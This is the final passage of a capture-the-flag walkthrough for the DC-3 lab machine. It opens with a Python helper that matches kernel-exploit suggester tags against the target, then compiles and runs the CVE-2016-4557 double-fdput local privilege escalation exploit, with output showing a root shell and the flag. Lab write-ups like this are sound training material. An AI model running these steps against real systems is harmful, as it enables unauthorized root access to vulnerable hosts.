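                    r"(?:\{kernel:(?P<kernel>[^}]+)\})?$")


def split_tags(tags: str) -> List[str]:
    """Split on commas that are not inside {...} or (...), after dropping the brackets."""
    out, depth, cur = [], 0, []
    for ch in tags.replace("[ ", "").replace(" ]", ""):
        if ch in "{(":
            depth += 1
        elif ch in "})":
            depth -= 1
        if ch == "," and depth == 0:
            out.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    if cur:
        out.append("".join(cur).strip())
    return out


def kernel_regex(pattern: str):
    """Turn '4.4.0-(21|22)-generic' or '2.6.32-*' into a regex; '.' is literal."""
    parts = []
    for ch in pattern:
        if ch == "*":
            parts.append(".*")
        elif ch in "(|)":
            parts.append(ch)
        else:
            parts.append(re.escape(ch))
    return re.compile("".join(parts))


def match_tag(tag: str, info: dict) -> Optional[str]:
    """'exact' if distro, version and kernel all match; 'distro' without a kernel match."""
    m = TAG_RE.match(tag)
    if not m or m.group("distro").lower() != info["distro"].lower():
        return None
    versions = m.group("versions").strip("()").split("|")
    if info["version"] not in versions:
        return None
    kernel = m.group("kernel")
    if kernel is None:
        return "distro"
    return "exact" if kernel_regex(kernel).fullmatch(info["kernel"]) else "distro"


def exposure(tags: str, info: dict = DC3) -> Optional[str]:
    """Best level across all tags of one entry: 'exact' beats 'distro' beats None."""
    levels = [match_tag(t, info) for t in split_tags(tags)]
    if "exact" in levels:
        return "exact"
    if "distro" in levels:
        return "distro"
    return None


if __name__ == "__main__":
    # Tags copied from the suggester output above
    samples = {
        "CVE-2016-4557 double-fdput()": "[ ubuntu=16.04{kernel:4.4.0-21-generic} ]",
        "CVE-2016-8655 chocobo_root": "[ ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic} ]",
        "CVE-2017-7308 af_packet": "[ ubuntu=16.04 ]{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}",
        "CVE-2019-18634 sudo pwfeedback": "mint=19",
    }
    for name, tags in samples.items():
        print(f"{name:32s} {exposure(tags)}")
```

The matcher deliberately says nothing about the Comments line: a kernel match does not mean the prerequisites are satisfied, so CONFIG_BPF_SYSCALL and kernel.unprivileged_bpf_disabled still have to be checked on the target before the exploit is run.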
Download the exploit from the listed URL and upload it to /tmp on the target (figure):
Unzipping it produces two packed files (figure):
Extracting exploit.tar gives four files (figure):
compile.sh compiles the other three:
cat compile.sh
#!/bin/sh
gcc -o hello hello.c -Wall -std=gnu99 `pkg-config fuse --cflags --libs`
gcc -o doubleput doubleput.c -Wall
gcc -o suidhelper suidhelper.c -Wall
Make compile.sh executable and run it:
chmod +x compile.sh;./compile.sh
Some warnings appear; they are harmless (a 32-bit pointer being cast to the 64-bit __aligned_u64 field on this i686 build):
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
Now run ./doubleput; output:
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
Root obtained!
Get an interactive shell (figure).
Change to /root to read the flag.
That completes the DC-3 walkthrough, from enumeration to root. Thanks for reading!